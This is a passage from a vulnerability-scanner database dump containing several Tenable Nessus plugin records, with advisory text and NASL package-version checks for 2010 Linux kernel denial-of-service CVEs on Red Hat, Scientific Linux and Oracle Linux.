reference:\"kernel-kdump-debuginfo-2.6.32-71.18.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-kdump-devel-2.6.32-71.18.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"perf-2.6.32-71.18.1.el6\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-debug / kernel-debug-debuginfo / kernel-debug-devel / etc\");\n }\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-17T13:45:27", "description": "This update fixes the following security issues :\n\n - A divide-by-zero flaw was found in the\n tcp_select_initial_window() function in the Linux\n kernel's TCP/IP protocol suite implementation. A local,\n unprivileged user could use this flaw to trigger a\n denial of service by calling setsockopt() with certain\n options. (CVE-2010-4165, Moderate)\n\n - A use-after-free flaw in the mprotect() system call in\n the Linux kernel could allow a local, unprivileged user\n to cause a local denial of service. (CVE-2010-4169,\n Moderate)\n\n - A flaw was found in the Linux kernel execve() system\n call implementation. A local, unprivileged user could\n cause large amounts of memory to be allocated but not\n visible to the OOM (Out of Memory) killer, triggering a\n denial of service. (CVE-2010-4243, Moderate)\n\nThis update also fixes several bugs and adds two enhancements.\n\nThe system must be rebooted for this update to take effect.", "edition": 26, "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : kernel on SL6.x i386/x86_64", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-4165", "CVE-2010-4169", "CVE-2010-4243"], "modified": "2012-08-01T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20110222_KERNEL_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/60965", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(60965);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-4165\", \"CVE-2010-4169\", \"CVE-2010-4243\");\n\n script_name(english:\"Scientific Linux Security Update : kernel on SL6.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes the following security issues :\n\n - A divide-by-zero flaw was found in the\n tcp_select_initial_window() function in the Linux\n kernel's TCP/IP protocol suite implementation. A local,\n unprivileged user could use this flaw to trigger a\n denial of service by calling setsockopt() with certain\n options. (CVE-2010-4165, Moderate)\n\n - A use-after-free flaw in the mprotect() system call in\n the Linux kernel could allow a local, unprivileged user\n to cause a local denial of service. (CVE-2010-4169,\n Moderate)\n\n - A flaw was found in the Linux kernel execve() system\n call implementation. A local, unprivileged user could\n cause large amounts of memory to be allocated but not\n visible to the OOM (Out of Memory) killer, triggering a\n denial of service. (CVE-2010-4243, Moderate)\n\nThis update also fixes several bugs and adds two enhancements.\n\nThe system must be rebooted for this update to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1103&L=scientific-linux-errata&T=0&P=1215\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5c539730\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/11/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/02/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"kernel-2.6.32-71.18.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debug-2.6.32-71.18.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debug-devel-2.6.32-71.18.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-devel-2.6.32-71.18.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-doc-2.6.32-71.18.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-firmware-2.6.32-71.18.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-headers-2.6.32-71.18.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perf-2.6.32-71.18.1.el6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-17T12:45:42", "description": "From Red Hat Security Advisory 2011:0283 :\n\nUpdated kernel packages that fix three security issues, several bugs,\nand add two enhancements are now available for Red Hat Enterprise\nLinux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues :\n\n* A divide-by-zero flaw was found in the tcp_select_initial_window()\nfunction in the Linux kernel's TCP/IP protocol suite implementation. A\nlocal, unprivileged user could use this flaw to trigger a denial of\nservice by calling setsockopt() with certain options. (CVE-2010-4165,\nModerate)\n\n* A use-after-free flaw in the mprotect() system call in the Linux\nkernel could allow a local, unprivileged user to cause a local denial\nof service. (CVE-2010-4169, Moderate)\n\n* A flaw was found in the Linux kernel execve() system call\nimplementation. A local, unprivileged user could cause large amounts\nof memory to be allocated but not visible to the OOM (Out of Memory)\nkiller, triggering a denial of service. (CVE-2010-4243, Moderate)\n\nRed Hat would like to thank Steve Chen for reporting CVE-2010-4165,\nand Brad Spengler for reporting CVE-2010-4243.\n\nThis update also fixes several bugs and adds two enhancements.\nDocumentation for these bug fixes and enhancements will be available\nshortly from the Technical Notes document linked to in the References\nsection.\n\nUsers should upgrade to these updated packages, which contain\nbackported patches to correct these issues, and fix the bugs and add\nthe enhancements noted in the Technical Notes. The system must be\nrebooted for this update to take effect.", "edition": 27, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 6 : kernel (ELSA-2011-0283)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-4165", "CVE-2010-4169", "CVE-2010-4243"], "modified": "2013-07-12T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:kernel-debug", "p-cpe:/a:oracle:linux:kernel-devel", "p-cpe:/a:oracle:linux:kernel-doc", "p-cpe:/a:oracle:linux:kernel-debug-devel", "p-cpe:/a:oracle:linux:kernel-headers", "p-cpe:/a:oracle:linux:kernel", "p-cpe:/a:oracle:linux:kernel-firmware"], "id": "ORACLELINUX_ELSA-2011-0283.NASL", "href": "https://www.tenable.com/plugins/nessus/68206", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2011:0283 and \n# Oracle Linux Security Advisory ELSA-2011-0283 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68206);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-4165\", \"CVE-2010-4169\", \"CVE-2010-4243\");\n script_bugtraq_id(44830, 44861, 45004);\n script_xref(name:\"RHSA\", value:\"2011:0283\");\n\n script_name(english:\"Oracle Linux 6 : kernel (ELSA-2011-0283)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2011:0283 :\n\nUpdated kernel packages that fix three security issues, several bugs,\nand add two enhancements are now available for Red Hat Enterprise\nLinux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues :\n\n* A divide-by-zero flaw was found in the tcp_select_initial_window()\nfunction in the Linux kernel's TCP/IP protocol suite implementation. A\nlocal, unprivileged user could use this flaw to trigger a denial of\nservice by calling setsockopt() with certain options. (CVE-2010-4165,\nModerate)\n\n* A use-after-free flaw in the mprotect() system call in the Linux\nkernel could allow a local, unprivileged user to cause a local denial\nof service. (CVE-2010-4169, Moderate)\n\n* A flaw was found in the Linux kernel execve() system call\nimplementation. A local, unprivileged user could cause large amounts\nof memory to be allocated but not visible to the OOM (Out of Memory)\nkiller, triggering a denial of service. (CVE-2010-4243, Moderate)\n\nRed Hat would like to thank Steve Chen for reporting CVE-2010-4165,\nand Brad Spengler for reporting CVE-2010-4243.\n\nThis update also fixes several bugs and adds two enhancements.\nDocumentation for these bug fixes and enhancements will be available\nshortly from the Technical Notes document linked to in the References\nsection.\n\nUsers should upgrade to these updated packages, which contain\nbackported patches to correct these issues, and fix the bugs and add\nthe enhancements noted in the Technical Notes. The system must be\nrebooted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2011-March/002009.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/11/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/03/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2010-4165\", \"CVE-2010-4169\", \"CVE-2010-4243\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2011-0283\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"2.6\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-2.6.32-71.18.1.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-debug-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-debug-2.6.32-71.18.1.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-debug-devel-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-debug-devel-2.6.32-71.18.1.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-devel-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-devel-2.6.32-71.18.1.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-doc-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-doc-2.6.32-71.18.1.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-firmware-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-firmware-2.6.32-71.18.1.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-headers-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-headers-2.6.32-71.18.1.el6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-17T12:46:25", "description": "Description of changes:\n\n[2.6.32-100.28.9.el5]\n- sync up with uek6 version\n\n[2.6.32-100.26.4.el5]\n- [block] check for proper length of iov entries earlier in \nblk_rq_map_user_iov\n (Xiaotian Feng) {CVE-2010-4668}\n- scm: lower SCM_MAX_FD (Eric Dumazet) {CVE-2010-4249}\n- perf_events: Fix perf_counter_mmap() hook in mprotect() (Pekka Enberg)\n {CVE-2010-4169}\n- tcp: Increase TCP_MAXSEG socket option minimum (David S. Miller)\n {CVE-2010-4165}\n- Enable module force load option [orabug 11782146]\n- Enable vmw balloon and pvscsi (Guru Anbalagane) [orabug 11697522]\n- fix hpilo module option in config\n\n[2.6.32-100.26.3.el5]\n- build from git", "edition": 24, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 5 / 6 : Unbreakable Enterprise kernel (ELSA-2011-2010)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-4668", "CVE-2010-4165", "CVE-2010-4169", "CVE-2010-4249"], "modified": "2013-07-12T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:kernel-uek-firmware", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:kernel-uek", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:kernel-uek-debug-devel", "p-cpe:/a:oracle:linux:kernel-uek-devel", "p-cpe:/a:oracle:linux:ofa-2.6.32-100.28.9.el5debug", "p-cpe:/a:oracle:linux:kernel-uek-headers", "p-cpe:/a:oracle:linux:ofa-2.6.32-100.28.9.el5", "p-cpe:/a:oracle:linux:kernel-uek-debug"], "id": "ORACLELINUX_ELSA-2011-2010.NASL", "href": "https://www.tenable.com/plugins/nessus/68414", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2011-2010.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68414);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-4165\", \"CVE-2010-4169\", \"CVE-2010-4249\", \"CVE-2010-4668\");\n\n script_name(english:\"Oracle Linux 5 / 6 : Unbreakable Enterprise kernel (ELSA-2011-2010)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n[2.6.32-100.28.9.el5]\n- sync up with uek6 version\n\n[2.6.32-100.26.4.el5]\n- [block] check for proper length of iov entries earlier in \nblk_rq_map_user_iov\n (Xiaotian Feng) {CVE-2010-4668}\n- scm: lower SCM_MAX_FD (Eric Dumazet) {CVE-2010-4249}\n- perf_events: Fix perf_counter_mmap() hook in mprotect() (Pekka Enberg)\n {CVE-2010-4169}\n- tcp: Increase TCP_MAXSEG socket option minimum (David S. Miller)\n {CVE-2010-4165}\n- Enable module force load option [orabug 11782146]\n- Enable vmw balloon and pvscsi (Guru Anbalagane) [orabug 11697522]\n- fix hpilo module option in config\n\n[2.6.32-100.26.3.el5]\n- build from git\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2011-March/002008.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2011-March/002014.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ofa-2.6.32-100.28.9.el5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ofa-2.6.32-100.28.9.el5debug\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/11/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/03/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5 / 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2010-4165\", \"CVE-2010-4169\", \"CVE-2010-4249\", \"CVE-2010-4668\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2011-2010\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"2.6\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-2.6.32\") && rpm_check(release:\"EL5\", cpu:\"x86_64\", reference:\"kernel-uek-2.6.32-100.28.9.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-debug-2.6.32\") && rpm_check(release:\"EL5\", cpu:\"x86_64\", reference:\"kernel-uek-debug-2.6.32-100.28.9.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-debug-devel-2.6.32\") && rpm_check(release:\"EL5\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-2.6.32-100.28.9.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-devel-2.6.32\") && rpm_check(release:\"EL5\", cpu:\"x86_64\", reference:\"kernel-uek-devel-2.6.32-100.28.9.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-doc-2.6.32\") && rpm_check(release:\"EL5\", cpu:\"x86_64\", reference:\"kernel-uek-doc-2.6.32-100.28.9.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-firmware-2.6.32\") && rpm_check(release:\"EL5\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-2.6.32-100.28.9.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-headers-2.6.32\") && rpm_check(release:\"EL5\", cpu:\"x86_64\", reference:\"kernel-uek-headers-2.6.32-100.28.9.el5\")) flag++;\nif (rpm_check(release:\"EL5\", cpu:\"x86_64\", reference:\"ofa-2.6.32-100.28.9.el5-1.5.1-4.0.28\")) flag++;\nif (rpm_check(release:\"EL5\", cpu:\"x86_64\", reference:\"ofa-2.6.32-100.28.9.el5debug-1.5.1-4.0.28\")) flag++;\n\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-2.6.32\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-2.6.32-100.28.9.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-2.6.32\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-2.6.32-100.28.9.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-2.6.32\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-2.6.32-100.28.9.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-2.6.32\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-devel-2.6.32-100.28.9.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-2.6.32\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-doc-2.6.32-100.28.9.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-2.6.32\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-2.6.32-100.28.9.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-headers-2.6.32\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-headers-2.6.32-100.28.9.el6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 4.9, "vector": 